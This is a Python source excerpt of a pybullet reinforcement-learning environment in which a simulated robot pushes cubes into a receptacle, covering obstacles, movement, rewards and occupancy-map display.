CAMERA_NEAR = 0.01
CAMERA_FAR = 10
FLOOR_SEG_INDEX = 1
OBSTACLE_SEG_INDEX = 2
RECEPTACLE_SEG_INDEX = 3
CUBE_SEG_INDEX = 4
ROBOT_SEG_INDEX = 5
MAX_SEG_INDEX = 8
# Overhead map
LOCAL_MAP_PIXEL_WIDTH = 96
LOCAL_MAP_WIDTH = 1 # 1 meter
LOCAL_MAP_PIXELS_PER_METER = LOCAL_MAP_PIXEL_WIDTH / LOCAL_MAP_WIDTH
MAP_UPDATE_STEPS = 250
class Environment:
def __init__(
# pylint: disable=bad-continuation
# This comment is here to make code folding work
self, room_length=1.0, room_width=0.5, num_cubes=10, obstacle_config='small_empty',
use_distance_to_receptacle_channel=True, distance_to_receptacle_channel_scale=0.25,
use_shortest_path_to_receptacle_channel=False, use_shortest_path_channel=False, shortest_path_channel_scale=0.25,
use_position_channel=False, position_channel_scale=0.25,
partial_rewards_scale=2.0, use_shortest_path_partial_rewards=False, collision_penalty=0.25, nonmovement_penalty=0.25,
use_shortest_path_movement=False, fixed_step_size=None, use_steering_commands=False, steering_commands_num_turns=4,
ministep_size=0.25, inactivity_cutoff=100, random_seed=None,
use_gui=False, show_debug_annotations=False, show_occupancy_map=False,
):
################################################################################
# Store arguments
# Room config
self.room_length = room_length
self.room_width = room_width
self.num_cubes = num_cubes
self.obstacle_config = obstacle_config
# State representation
self.use_distance_to_receptacle_channel = use_distance_to_receptacle_channel
self.distance_to_receptacle_channel_scale = distance_to_receptacle_channel_scale
self.use_shortest_path_to_receptacle_channel = use_shortest_path_to_receptacle_channel
self.use_shortest_path_channel = use_shortest_path_channel
self.shortest_path_channel_scale = shortest_path_channel_scale
self.use_position_channel = use_position_channel
self.position_channel_scale = position_channel_scale
# Rewards
self.partial_rewards_scale = partial_rewards_scale
self.use_shortest_path_partial_rewards = use_shortest_path_partial_rewards
self.collision_penalty = collision_penalty
self.nonmovement_penalty = nonmovement_penalty
# Movement
self.use_shortest_path_movement = use_shortest_path_movement
self.fixed_step_size = fixed_step_size
self.use_steering_commands = use_steering_commands
self.steering_commands_num_turns = steering_commands_num_turns
# Misc
self.ministep_size = ministep_size
self.inactivity_cutoff = inactivity_cutoff
self.random_seed = random_seed
self.use_gui = use_gui
self.show_debug_annotations = show_debug_annotations
self.show_occupancy_map = show_occupancy_map
pprint.PrettyPrinter(indent=4).pprint(self.__dict__)
################################################################################
# Room and objects
assert self.num_cubes > 0
assert self.room_length >= self.room_width
# Random placement of robots, cubes, and obstacles
self.random_state = np.random.RandomState(self.random_seed)
# Trash receptacle
self.receptacle_position = [self.room_length / 2 - RECEPTACLE_WIDTH / 2, self.room_width / 2 - RECEPTACLE_WIDTH / 2, 0]
self.receptacle_id = None
# Obstacles
self.obstacle_ids = None
self.min_obstacle_id = None
self.max_obstacle_id = None
# Robot
self.robot_id = None
self.robot_cid = None
self.robot_position = None
self.robot_heading = None
self.robot_cumulative_cubes = None
self.robot_cumulative_distance = None
self.robot_cumulative_reward = None
# Cubes
self.cube_ids = None
self.min_cube_id = None
self.max_cube_id = None
self.available_cube_ids_set = None
self.removed_cube_ids_set = None
# Used to determine whether to end episode
self.inactivity_counter = None
################################################################################
# State representation
# Forward-facing camera
self.camera_image_pixel_height = int(1.63 * LOCAL_MAP_PIXEL_WIDTH)
self.camera_aspect = 16 / 9
self.camera_image_pixel_width = int(self.camera_aspect * self.camera_image_pixel_height)
self.projection_matrix = p.computeProjectionMatrixFOV(CAMERA_FOV, self.camera_aspect, CAMERA_NEAR, CAMERA_FAR)
# Robot state
robot_pixel_width = int(2 * ROBOT_RADIUS * LOCAL_MAP_PIXELS_PER_METER)
self.robot_state_channel = np.zeros((LOCAL_MAP_PIXEL_WIDTH, LOCAL_MAP_PIXEL_WIDTH), dtype=np.float32)
start = int(np.floor(LOCAL_MAP_PIXEL_WIDTH / 2 - robot_pixel_width / 2))
for i in range(start, start + robot_pixel_width):
for j in range(start, start + robot_pixel_width):
# Circular robot mask
if (((i + 0.5) - LOCAL_MAP_PIXEL_WIDTH / 2)**2 + ((j + 0.5) - LOCAL_MAP_PIXEL_WIDTH / 2)**2)**0.5 < robot_pixel_width / 2:
self.robot_state_channel[i, j] = 1
# Distance channel can be precomputed
if self.use_distance_to_receptacle_channel:
self.global_distance_to_receptacle_map = self._create_global_distance_to_receptacle_map()
# Used to mask out the wall pixels when updating occupancy map
room_mask = self._create_padded_room_zeros()
room_width_pixels = int(2 * np.ceil(((self.room_width - 2 * ROBOT_HALF_WIDTH) * LOCAL_MAP_PIXELS_PER_METER) / 2))
room_length_pixels = int(2 * np.ceil(((self.room_length - 2 * ROBOT_HALF_WIDTH) * LOCAL_MAP_PIXELS_PER_METER) / 2))
start_i, start_j = int(room_mask.shape[0] / 2 - room_width_pixels / 2), int(room_mask.shape[1] / 2 - room_length_pixels / 2)
room_mask[start_i:start_i + room_width_pixels, start_j:start_j + room_length_pixels] = 1
self.wall_map = 1 - room_mask
self.global_overhead_map = None
self.configuration_space = None
self.configuration_space_thin = None
self.closest_cspace_indices = None
self.occupancy_map = None
if self.show_occupancy_map:
import matplotlib.pyplot as plt # pylint: disable=import-outside-toplevel
self.plt = plt
self.plt.figure(figsize=(4, 4 * self.room_width / self.room_length))
self.plt.ion()
self.free_space_map = None
# Position channel can be precomputed
if self.use_position_channel:
self.local_position_map_x, self.local_position_map_y = self._create_local_position_map()
################################################################################
# pybullet
if self.use_gui:
p.connect(p.GUI)
p.configureDebugVisualizer(p.COV_ENABLE_GUI, 0)
else:
p.connect(p.DIRECT)
p.resetDebugVisualizerCamera(
0.47 + (5.25 - 0.47) / (10 - 0.7) * (self.room_length - 0.7), 0, -70,
(0, -(0.07 + (1.5 - 0.07) / (10 - 0.7) * (self.room_width - 0.7)), 0)
)
self.assets_dir = Path(__file__).parent / 'assets'
################################################################################
# Misc
if self.use_steering_commands:
increment = 360 / self.steering_commands_num_turns
self.simple_action_space_turn_angles = [np.radians(i * increment) for i in range(self.steering_commands_num_turns)]
def reset(self):
################################################################################
# Room and objects
# Reset pybullet
p.resetSimulation()
p.setRealTimeSimulation(0)
p.setGravity(0, 0, -9.8)
# Create the environment
self._create_environment()
self._reset_poses()
self._step_simulation_until_still()
################################################################################
# State representation
self.global_overhead_map = self._create_padded_room_zeros()
self.occupancy_map = self._create_padded_room_zeros()
if self.show_occupancy_map:
self.free_space_map = self._create_padded_room_zeros()
self.robot_position, self.robot_heading = self._get_robot_pose()
self._update_state()
if self.show_occupancy_map:
self._update_occupancy_map_visualization()
################################################################################
# Variables
# Sets to track cubes
self.available_cube_ids_set = set(self.cube_ids) # Cubes that have not been removed
self.removed_cube_ids_set = set()
# Counters
self.inactivity_counter = 0
self.robot_cumulative_cubes = 0
self.robot_cumulative_distance = 0
self.robot_cumulative_reward = 0
################################################################################
return self.get_state()
def step(self, action):
return self._step(action)
def _step(self, action, dry_run=False):
################################################################################
# Setup
# Store new action
if self.use_steering_commands:
robot_action = action
else:
robot_action = np.unravel_index(action, (LOCAL_MAP_PIXEL_WIDTH, LOCAL_MAP_PIXEL_WIDTH))
robot_cubes = 0
robot_reward = 0
robot_hit_obstacle = False
# Initial pose
robot_initial_position, robot_initial_heading = self._get_robot_pose()
# Compute target end effector position
if self.use_steering_commands:
straight_line_dist = self.fixed_step_size + ROBOT_RADIUS
turn_angle = np.radians(90) - self.simple_action_space_turn_angles[robot_action]
else:
# Compute distance from front of robot (not robot center), which is used to find the
# robot position and heading needed in order to place end effector over specified location.
x_movement = -LOCAL_MAP_WIDTH / 2 + float(robot_action[1]) / LOCAL_MAP_PIXELS_PER_METER
y_movement = LOCAL_MAP_WIDTH / 2 - float(robot_action[0]) / LOCAL_MAP_PIXELS_PER_METER
if self.fixed_step_size is not None:
straight_line_dist = self.fixed_step_size + ROBOT_RADIUS
else:
straight_line_dist = np.sqrt(x_movement**2 + y_movement**2)
turn_angle = np.arctan2(-x_movement, y_movement)
straight_line_heading = restrict_heading_range(robot_initial_heading + turn_angle)
robot_target_end_effector_position = [
robot_initial_position[0] + straight_line_dist * np.cos(straight_line_heading),
robot_initial_position[1] + straight_line_dist * np.sin(straight_line_heading),
0
]
# Do not allow going outside the room
diff = np.asarray(robot_target_end_effector_position) - np.asarray(robot_initial_position)
ratio_x, ratio_y = (1, 1)
bound_x = np.sign(robot_target_end_effector_position[0]) * self.room_length / 2
bound_y = np.sign(robot_target_end_effector_position[1]) * self.room_width / 2
if abs(robot_target_end_effector_position[0]) > abs(bound_x):
ratio_x = (bound_x - robot_initial_position[0]) / (robot_target_end_effector_position[0] - robot_initial_position[0])
if abs(robot_target_end_effector_position[1]) > abs(bound_y):
ratio_y = (bound_y - robot_initial_position[1]) / (robot_target_end_effector_position[1] - robot_initial_position[1])
ratio = min(ratio_x, ratio_y)
robot_target_end_effector_position = (np.asarray(robot_initial_position) + ratio * diff).tolist()
if dry_run:
# Used in real environment
return robot_target_end_effector_position
# Compute waypoint positions
if self.use_shortest_path_movement:
robot_waypoint_positions = self._shortest_path(robot_initial_position, robot_target_end_effector_position, check_straight=True)
else:
robot_waypoint_positions = [robot_initial_position, robot_target_end_effector_position]
# Compute waypoint headings
robot_waypoint_headings = [None]
for i in range(1, len(robot_waypoint_positions)):
x_diff = robot_waypoint_positions[i][0] - robot_waypoint_positions[i - 1][0]
y_diff = robot_waypoint_positions[i][1] - robot_waypoint_positions[i - 1][1]
waypoint_heading = restrict_heading_range(np.arctan2(y_diff, x_diff))
robot_waypoint_headings.append(waypoint_heading)
# Compute movement from final waypoint to the target and apply ROBOT_RADIUS offset to the final waypoint
dist_to_target_end_effector_position = distance(robot_waypoint_positions[-2], robot_waypoint_positions[-1])
signed_dist = dist_to_target_end_effector_position - ROBOT_RADIUS
robot_move_sign = np.sign(signed_dist) # Whether to move backwards to get to final position
robot_target_heading = robot_waypoint_headings[-1]
robot_target_position = [
robot_waypoint_positions[-2][0] + signed_dist * np.cos(robot_target_heading),
robot_waypoint_positions[-2][1] + signed_dist * np.sin(robot_target_heading),
0
]
robot_waypoint_positions[-1] = robot_target_position
# Avoid awkward backing up to reach the last waypoint
if len(robot_waypoint_positions) > 2 and signed_dist < 0:
robot_waypoint_positions[-2] = robot_waypoint_positions[-1]
x_diff = robot_waypoint_positions[-2][0] - robot_waypoint_positions[-3][0]
y_diff = robot_waypoint_positions[-2][1] - robot_waypoint_positions[-3][1]
waypoint_heading = restrict_heading_range(np.arctan2(y_diff, x_diff))
robot_waypoint_headings[-2] = waypoint_heading
robot_move_sign = 1
# Store the initial configuration space at the start of the step (for partial reward calculation)
initial_configuration_space = self.configuration_space.copy()
# Store initial cube distances for partial reward calculation
initial_cube_distances = {}
cube_ids_to_track = list(self.cube_ids)
for cube_id in cube_ids_to_track:
cube_position, _ = p.getBasePositionAndOrientation(cube_id)
if self.use_shortest_path_partial_rewards:
dist = self._shortest_path_distance(cube_position, self.receptacle_position)
else:
dist = distance(cube_position, self.receptacle_position)
initial_cube_distances[cube_id] = dist
################################################################################
# Movement
self.robot_position = robot_initial_position.copy()
self.robot_heading = robot_initial_heading
robot_is_moving = True
robot_distance = 0
robot_waypoint_index = 1
robot_prev_waypoint_position = robot_waypoint_positions[robot_waypoint_index - 1]
robot_waypoint_position = robot_waypoint_positions[robot_waypoint_index]
robot_waypoint_heading = robot_waypoint_headings[robot_waypoint_index]
sim_steps = 0
while True:
if not robot_is_moving:
break
# Store pose to determine distance moved during simulation step
robot_prev_position = self.robot_position.copy()
robot_prev_heading = self.robot_heading
# Compute robot pose for new constraint
robot_new_position = self.robot_position.copy()
robot_new_heading = self.robot_heading
heading_diff = heading_difference(self.robot_heading, robot_waypoint_heading)
if np.abs(heading_diff) > TURN_STEP_SIZE:
# Turn towards next waypoint first
robot_new_heading += np.sign(heading_diff) * TURN_STEP_SIZE
else:
dx = robot_waypoint_position[0] - self.robot_position[0]
dy = robot_waypoint_position[1] - self.robot_position[1]
if distance(self.robot_position, robot_waypoint_position) < MOVE_STEP_SIZE:
robot_new_position = robot_waypoint_position
else:
if robot_waypoint_index == len(robot_waypoint_positions) - 1:
move_sign = robot_move_sign
else:
move_sign = 1
robot_new_heading = np.arctan2(move_sign * dy, move_sign * dx)
robot_new_position[0] += move_sign * MOVE_STEP_SIZE * np.cos(robot_new_heading)
robot_new_position[1] += move_sign * MOVE_STEP_SIZE * np.sin(robot_new_heading)
# Set new constraint to move the robot to new pose
p.changeConstraint(self.robot_cid, jointChildPivot=robot_new_position, jointChildFrameOrientation=p.getQuaternionFromEuler([0, 0, robot_new_heading]), maxForce=MOVEMENT_MAX_FORCE)
p.stepSimulation()
# Get new robot pose
self.robot_position, self.robot_heading = self._get_robot_pose()
self.robot_position[2] = 0
# Stop moving if robot collided with obstacle
if distance(robot_prev_waypoint_position, self.robot_position) > MOVE_STEP_SIZE:
contact_points = p.getContactPoints(self.robot_id)
if len(contact_points) > 0:
for contact_point in contact_points:
if contact_point[2] in self.obstacle_ids + [self.robot_id]:
robot_is_moving = False
robot_hit_obstacle = True
break # Note: self.robot_distance does not get not updated
# Robot no longer turning or moving
if (distance(self.robot_position, robot_prev_position) < NOT_MOVING_THRESHOLD
and np.abs(self.robot_heading - robot_prev_heading) < NOT_TURNING_THRESHOLD):
# Update distance moved
robot_distance += distance(robot_prev_waypoint_position, self.robot_position)
if self.show_debug_annotations:
p.addUserDebugLine(robot_prev_waypoint_position[:2] + [0.001], self.robot_position[:2] + [0.001], DEBUG_LINE_COLOR)
# Increment waypoint index, or stop moving if done
if robot_waypoint_index == len(robot_waypoint_positions) - 1:
robot_is_moving = False
else:
robot_waypoint_index += 1
robot_prev_waypoint_position = robot_waypoint_positions[robot_waypoint_index - 1]
robot_waypoint_position = robot_waypoint_positions[robot_waypoint_index]
robot_waypoint_heading = robot_waypoint_headings[robot_waypoint_index]
# Break if robot is stuck
sim_steps += 1
if sim_steps > STEP_LIMIT:
break # Note: self.robot_distance does not get not updated
if sim_steps % MAP_UPDATE_STEPS == 0:
self._update_state()
if self.show_occupancy_map:
self._update_occupancy_map_visualization(robot_waypoint_positions, robot_target_end_effector_position)
# Step the simulation until everything is still
self._step_simulation_until_still()
################################################################################
# Process cubes
# Store final cube positions and remove cubes that are above the wall
to_remove = []
final_cube_positions = {}
for cube_id in self.available_cube_ids_set:
cube_position, _ = p.getBasePositionAndOrientation(cube_id)
final_cube_positions[cube_id] = cube_position
if cube_position[2] > WALL_HEIGHT + 0.49 * CUBE_WIDTH or cube_position[2] < CUBE_WIDTH / 4:
self._remove_cube(cube_id, out_of_bounds=True)
to_remove.append(cube_id)
for cube_id in to_remove:
self.available_cube_ids_set.remove(cube_id)
# Give partial rewards
for cube_id in self.available_cube_ids_set:
cube_position = final_cube_positions[cube_id]
if self.use_shortest_path_partial_rewards:
dist = self._shortest_path_distance(cube_position, self.receptacle_position, configuration_space=initial_configuration_space)
else:
dist = distance(cube_position, self.receptacle_position)
dist_moved = initial_cube_distances[cube_id] - dist
robot_reward += self.partial_rewards_scale * dist_moved
# Give rewards for cubes in receptacle (and remove the cubes)
to_remove = []
for cube_id in self.available_cube_ids_set:
cube_position = final_cube_positions[cube_id]
if self._cube_position_in_receptacle(cube_position):
to_remove.append(cube_id)
self._remove_cube(cube_id)
robot_cubes += 1
robot_reward += 1
for cube_id in to_remove:
self.available_cube_ids_set.remove(cube_id)
################################################################################
# Update state representation
self.robot_position, self.robot_heading = self._get_robot_pose()
self._update_state()
if self.show_occupancy_map:
self._update_occupancy_map_visualization(robot_waypoint_positions, robot_target_end_effector_position)
################################################################################
# Compute stats
# Get final pose
self.robot_position, self.robot_heading = self._get_robot_pose()
# Add distance traveled to cumulative distance
self.robot_cumulative_distance += robot_distance
# Calculate amount turned to check if robot turned this step
robot_turn_angle = heading_difference(robot_initial_heading, self.robot_heading)
# Increment inactivity counter, which measures steps elapsed since the previous cube was stashed
if robot_cubes == 0:
self.inactivity_counter += 1
# Determine whether episode is done
done = False
if len(self.removed_cube_ids_set) == self.num_cubes or self.inactivity_counter >= self.inactivity_cutoff:
done = True
# Compute reward for the step
if robot_hit_obstacle:
robot_reward -= self.collision_penalty
if robot_distance < NONMOVEMENT_DIST_THRESHOLD and abs(robot_turn_angle) < NONMOVEMENT_TURN_THRESHOLD:
robot_reward -= self.nonmovement_penalty
self.robot_cumulative_cubes += robot_cubes
self.robot_cumulative_reward += robot_reward
# Compute items to return
state = self.get_state(done=done)
reward = robot_reward
ministeps = robot_distance / self.ministep_size
info = {
'ministeps': ministeps,
'inactivity': self.inactivity_counter,
'cumulative_cubes': self.robot_cumulative_cubes,
'cumulative_distance': self.robot_cumulative_distance,
'cumulative_reward': self.robot_cumulative_reward,
}
return state, reward, done, info
@staticmethod
def close():
p.disconnect()
@staticmethod
def get_state_width():
return LOCAL_MAP_PIXEL_WIDTH
def get_action_space(self):
if self.use_steering_commands:
return self.steering_commands_num_turns
return LOCAL_MAP_PIXEL_WIDTH * LOCAL_MAP_PIXEL_WIDTH
def get_camera_image(self, image_width=1024, image_height=768):
renderer = p.ER_BULLET_HARDWARE_OPENGL if self.use_gui else p.ER_TINY_RENDERER
_, _, rgb, _, _ = p.getCameraImage(image_width, image_height, flags=p.ER_NO_SEGMENTATION_MASK, renderer=renderer)
return rgb
@staticmethod
def start_video_logging(video_path):
return p.startStateLogging(p.STATE_LOGGING_VIDEO_MP4, video_path)
@staticmethod
def stop_video_logging(log_id):
p.stopStateLogging(log_id)
def _create_environment(self):
# Create floor
with tempfile.TemporaryDirectory() as tmp_dir_name:
# Create custom obj and urdf for current room size
room_length_with_walls = self.room_length + 2 * WALL_THICKNESS
room_width_with_walls = self.room_width + 2 * WALL_THICKNESS
plane_obj_path = str(Path(tmp_dir_name) / 'plane.obj')
with open(self.assets_dir / 'plane.obj.template') as f1:
with open(plane_obj_path, 'w') as f2:
f2.write(f1.read().replace('HALFLENGTH', str(room_length_with_walls / GLOBAL_SCALING / 2)).replace('HALFWIDTH', str(room_width_with_walls / GLOBAL_SCALING / 2)))
plane_urdf_path = str(Path(tmp_dir_name) / 'plane.urdf')
with open(self.assets_dir / 'plane.urdf.template') as f1:
with open(plane_urdf_path, 'w') as f2:
f2.write(f1.read().replace('LENGTH', str(room_length_with_walls / GLOBAL_SCALING)).replace('WIDTH', str(room_width_with_walls / GLOBAL_SCALING)))
p.loadURDF(plane_urdf_path, globalScaling=GLOBAL_SCALING)
# Create obstacles (including walls)
self.obstacle_ids = self._create_obstacles()
self.min_obstacle_id = min(self.obstacle_ids)
self.max_obstacle_id = max(self.obstacle_ids)
# Create trash receptacle
receptacle_collision_shape_id = p.createCollisionShape(p.GEOM_BOX, halfExtents=[0, 0, 0])
receptacle_visual_shape_id = p.createVisualShape(p.GEOM_BOX, halfExtents=[RECEPTACLE_WIDTH / 2, RECEPTACLE_WIDTH / 2, 0], rgbaColor=RECEPTACLE_COLOR, visualFramePosition=[0, 0, 0.0001])
self.receptacle_id = p.createMultiBody(0.01, receptacle_collision_shape_id, receptacle_visual_shape_id, self.receptacle_position)
# Create cubes
cube_collision_shape_id = p.createCollisionShape(p.GEOM_BOX, halfExtents=(3 * [CUBE_WIDTH / 2]))
cube_visual_shape_id = p.createVisualShape(p.GEOM_BOX, halfExtents=(3 * [CUBE_WIDTH / 2]), rgbaColor=CUBE_COLOR)
self.cube_ids = []
for _ in range(self.num_cubes):
self.cube_ids.append(p.createMultiBody(CUBE_MASS, cube_collision_shape_id, cube_visual_shape_id))
self.min_cube_id = min(self.cube_ids)
self.max_cube_id = max(self.cube_ids)
# Create robot and initialize contraint
self.robot_id = p.loadURDF(str(self.assets_dir / 'robot.urdf'))
self.robot_cid = p.createConstraint(self.robot_id, -1, -1, -1, p.JOINT_FIXED, [0, 0, 0], [0, 0, 0], [0, 0, 0])
def _create_obstacles(self):
obstacles = []
# Create walls
for x, y, length, width in [
(-self.room_length / 2 - WALL_THICKNESS / 2, 0, WALL_THICKNESS, self.room_width),
(self.room_length / 2 + WALL_THICKNESS / 2, 0, WALL_THICKNESS, self.room_width),
(0, -self.room_width / 2 - WALL_THICKNESS / 2, self.room_length + 2 * WALL_THICKNESS, WALL_THICKNESS),
(0, self.room_width / 2 + WALL_THICKNESS / 2, self.room_length + 2 * WALL_THICKNESS, WALL_THICKNESS)
]:
obstacles.append({'type': 'wall', 'position': (x, y), 'heading': 0, 'length': length, 'width': width})
def get_obstacle_box(obstacle, buffer_width=0.08):
x, y = obstacle['position']
length, width = obstacle['length'], obstacle['width']
b = box(x - length / 2, y - width / 2, x + length / 2, y + width / 2)
if buffer_width > 0:
b = b.buffer(buffer_width)
return b
def get_receptacle_box():
obstacle = {'position': self.receptacle_position[:2], 'heading': 0, 'length': RECEPTACLE_WIDTH, 'width': RECEPTACLE_WIDTH}
return get_obstacle_box(obstacle, buffer_width=0)
def add_random_columns(obstacles, max_num_columns):
num_columns = self.random_state.randint(max_num_columns) + 1
column_length = 0.1
column_width = 0.1
buffer_width = 0.08
polygons = [get_receptacle_box()] + [get_obstacle_box(obstacle) for obstacle in obstacles]
for _ in range(10):
new_obstacles = []
new_polygons = []
polygon_union = unary_union(polygons)
for _ in range(num_columns):
for _ in range(100):
x = self.random_state.uniform(
-self.room_length / 2 + 2 * buffer_width + column_length / 2,
self.room_length / 2 - 2 * buffer_width - column_length / 2
)
y = self.random_state.uniform(
-self.room_width / 2 + 2 * buffer_width + column_width / 2,
self.room_width / 2 - 2 * buffer_width - column_width / 2
)
obstacle = {'type': 'column', 'position': (x, y), 'heading': 0, 'length': column_length, 'width': column_width}
b = get_obstacle_box(obstacle)
if not polygon_union.intersects(b):
new_obstacles.append(obstacle)
new_polygons.append(b)
polygon_union = unary_union(polygons + new_polygons)
break
if len(new_obstacles) == num_columns:
break
return new_obstacles
def add_random_horiz_divider():
divider_length = 0.8
divider_width = 0.05
buffer_width = (2 + np.sqrt(2)) * ROUNDED_CORNER_WIDTH
polygons = unary_union([get_receptacle_box()])
for _ in range(10):
new_obstacles = []
for _ in range(100):
x = self.room_length / 2 - divider_length / 2
y = self.random_state.uniform(
-self.room_width / 2 + buffer_width + divider_width / 2,
self.room_width / 2 - buffer_width - divider_width / 2
)
obstacle = {'type': 'divider', 'position': [x, y], 'heading': 0, 'length': divider_length, 'width': divider_width}
b_no_inflate = get_obstacle_box(obstacle, buffer_width=0)
if not polygons.intersects(b_no_inflate):
new_obstacles.append(obstacle)
break
if len(new_obstacles) == 1:
break
return new_obstacles
# Create obstacles
if self.obstacle_config == 'small_empty':
pass
elif self.obstacle_config == 'small_columns':
obstacles.extend(add_random_columns(obstacles, 3))
elif self.obstacle_config == 'large_columns':
obstacles.extend(add_random_columns(obstacles, 8))
elif self.obstacle_config == 'large_divider':
obstacles.extend(add_random_horiz_divider())
else:
raise Exception(self.obstacle_config)
# Create room corners
for i, (x, y) in enumerate([
(-self.room_length / 2, self.room_width / 2),
(self.room_length / 2, self.room_width / 2),
(self.room_length / 2, -self.room_width / 2),
(-self.room_length / 2, -self.room_width / 2)
]):
if i == 1: # Skip the receptacle corner
continue
heading = -np.radians(i * 90)
offset = ROUNDED_CORNER_WIDTH / np.sqrt(2)
adjusted_position = (x + offset * np.cos(heading - np.radians(45)), y + offset * np.sin(heading - np.radians(45)))
obstacles.append({'type': 'corner', 'position': adjusted_position, 'heading': heading})
# Create additional corners for the divider
new_obstacles = []
for obstacle in obstacles:
if obstacle['type'] == 'divider':
(x, y), length, width = obstacle['position'], obstacle['length'], obstacle['width']
corner_positions = [(self.room_length / 2, y - width / 2), (self.room_length / 2, y + width / 2)]
corner_headings = [-90, 180]
for position, heading in zip(corner_positions, corner_headings):
heading = np.radians(heading)
offset = ROUNDED_CORNER_WIDTH / np.sqrt(2)
adjusted_position = (position[0] + offset * np.cos(heading - np.radians(45)), position[1] + offset * np.sin(heading - np.radians(45)))
obstacles.append({'type': 'corner', 'position': adjusted_position, 'heading': heading})
obstacles.extend(new_obstacles)
# Add obstacles to pybullet
obstacle_ids = []
for obstacle in obstacles:
if obstacle['type'] == 'corner':
obstacle_collision_shape_id = p.createCollisionShape(p.GEOM_MESH, fileName=str(self.assets_dir / 'corner.obj'))
obstacle_visual_shape_id = p.createVisualShape(p.GEOM_MESH, fileName=str(self.assets_dir / 'corner.obj'), rgbaColor=OBSTACLE_COLOR)
else:
obstacle_half_extents = [obstacle['length'] / 2, obstacle['width'] / 2, WALL_HEIGHT / 2]
obstacle_collision_shape_id = p.createCollisionShape(p.GEOM_BOX, halfExtents=obstacle_half_extents)
obstacle_visual_shape_id = p.createVisualShape(p.GEOM_BOX, halfExtents=obstacle_half_extents, rgbaColor=OBSTACLE_COLOR)
obstacle_id = p.createMultiBody(
0, obstacle_collision_shape_id, obstacle_visual_shape_id,
[obstacle['position'][0], obstacle['position'][1], WALL_HEIGHT / 2], p.getQuaternionFromEuler([0, 0, obstacle['heading']])
)
obstacle_ids.append(obstacle_id)
return obstacle_ids
def _reset_poses(self):
# Random robot pose
robot_positions_x, robot_positions_y = self._random_position(ROBOT_RADIUS, 1)
robot_positions = np.stack([robot_positions_x, robot_positions_y, np.tile(0, 1)], axis=1)
robot_headings = self.random_state.uniform(-np.pi, np.pi, 1)
p.resetBasePositionAndOrientation(self.robot_id, robot_positions[0], p.getQuaternionFromEuler([0, 0, robot_headings[0]]))
p.changeConstraint(self.robot_cid, jointChildPivot=robot_positions[0], jointChildFrameOrientation=p.getQuaternionFromEuler([0, 0, robot_headings[0]]), maxForce=MOVEMENT_MAX_FORCE)
# Random cube poses
for cube_id in self.cube_ids:
cube_heading = self.random_state.uniform(-np.pi, np.pi)
# Only spawn cubes outside of the receptacle
done = False
while not done:
cube_position_x, cube_position_y = self._random_position(CUBE_WIDTH / 2)
cube_position = [cube_position_x, cube_position_y]
if not self._cube_position_in_receptacle(cube_position):
done = True
cube_position.append(CUBE_WIDTH / 2)
p.resetBasePositionAndOrientation(cube_id, cube_position, p.getQuaternionFromEuler([0, 0, cube_heading]))
def _random_position(self, radius, size=None):
position_x = self.random_state.uniform(-self.room_length / 2 + radius, self.room_length / 2 - radius, size)
position_y = self.random_state.uniform(-self.room_width / 2 + radius, self.room_width / 2 - radius, size)
return position_x, position_y
def _step_simulation_until_still(self):
# Kick-start gravity
for _ in range(2):
p.stepSimulation()
prev_positions = []
sim_steps = 0
done = False
while not done:
# Check whether anything moved since last step
positions = []
for body_id in self.cube_ids + [self.robot_id]:
position, _ = p.getBasePositionAndOrientation(body_id)
positions.append(position)
if len(prev_positions) > 0:
done = True
for i, position in enumerate(positions):
# Ignore cubes that are in free fall
if position[2] > 0 and np.linalg.norm(np.asarray(prev_positions[i]) - np.asarray(position)) > NOT_MOVING_THRESHOLD:
done = False
break
prev_positions = positions
p.stepSimulation()
# If robot is stacked on top of a cube, reset its position
self.robot_position, self.robot_heading = self._get_robot_pose()
if np.abs(self.robot_position[2]) > ROBOT_HEIGHT / 4:
done = False
robot_position_x, robot_position_y = self._random_position(ROBOT_RADIUS)
self.robot_position = [robot_position_x, robot_position_y]
self.robot_position.append(0)
p.changeConstraint(self.robot_cid, jointChildPivot=self.robot_position, jointChildFrameOrientation=p.getQuaternionFromEuler([0, 0, self.robot_heading]), maxForce=500)
# Break if stuck
sim_steps += 1
if sim_steps > STEP_LIMIT:
break
def _get_robot_pose(self):
robot_position, robot_orientation = p.getBasePositionAndOrientation(self.robot_id)
robot_position = list(robot_position)
robot_heading = orientation_to_heading(robot_orientation)
return robot_position, robot_heading
def _remove_cube(self, cube_id, out_of_bounds=False):
# Hide cubes 1000 m below
p.resetBasePositionAndOrientation(cube_id, [0, 0, -1000], [0, 0, 0, 1])
self.removed_cube_ids_set.add(cube_id)
if not out_of_bounds:
self.inactivity_counter = 0
def _cube_position_in_receptacle(self, cube_position):
cube_position_copy = list(cube_position)
# Sometimes the cube gets squished against the wall
if np.abs(cube_position_copy[0]) + CUBE_WIDTH / 2 > self.room_length / 2:
cube_position_copy[0] = np.sign(cube_position_copy[0]) * (self.room_length / 2 - CUBE_WIDTH)
if np.abs(cube_position_copy[1]) + CUBE_WIDTH / 2 > self.room_width / 2:
cube_position_copy[1] = np.sign(cube_position_copy[1]) * (self.room_width / 2 - CUBE_WIDTH)
vec = np.asarray(cube_position_copy[:2]) - np.asarray(self.receptacle_position[:2])
rotated_vec = [np.cos(-0) * vec[0] - np.sin(-0) * vec[1], np.sin(-0) * vec[0] + np.cos(0) * vec[1]]
if (np.abs(rotated_vec[0]) < (RECEPTACLE_WIDTH - CUBE_WIDTH) / 2 and np.abs(rotated_vec[1]) < (RECEPTACLE_WIDTH - CUBE_WIDTH) / 2):
return True
return False
def _update_occupancy_map_visualization(self, robot_waypoint_positions=None, robot_target_end_effector_position=None):
occupancy_map_vis = self._create_padded_room_zeros() + 0.5
occupancy_map_vis[np.isclose(self.free_space_map, 1)] = 1
occupancy_map_vis[np.isclose(self.occupancy_map, 1)] = 0
height, width = occupancy_map_vis.shape
height, width = height / LOCAL_MAP_PIXELS_PER_METER, width / LOCAL_MAP_PIXELS_PER_METER
self.plt.clf()
self.plt.axis('off')
self.plt.axis([
-self.room_length / 2 - ROBOT_RADIUS, self.room_length / 2 + ROBOT_RADIUS,
-self.room_width / 2 - ROBOT_RADIUS, self.room_width / 2 + ROBOT_RADIUS
])
self.plt.imshow(255 * occupancy_map_vis, extent=(-width / 2, width / 2, -height / 2, height / 2), cmap='gray', vmin=0, vmax=255)
if robot_waypoint_positions is not None:
self.plt.plot(np.asarray(robot_waypoint_positions)[:, 0], np.asarray(robot_waypoint_positions)[:, 1], color='r', marker='.')
if robot_target_end_effector_position is not None:
self.plt.plot(robot_target_end_effector_position[0], robot_target_end_effector_position[1], color='r', marker='x')
self.plt.pause(0.001) # Update display
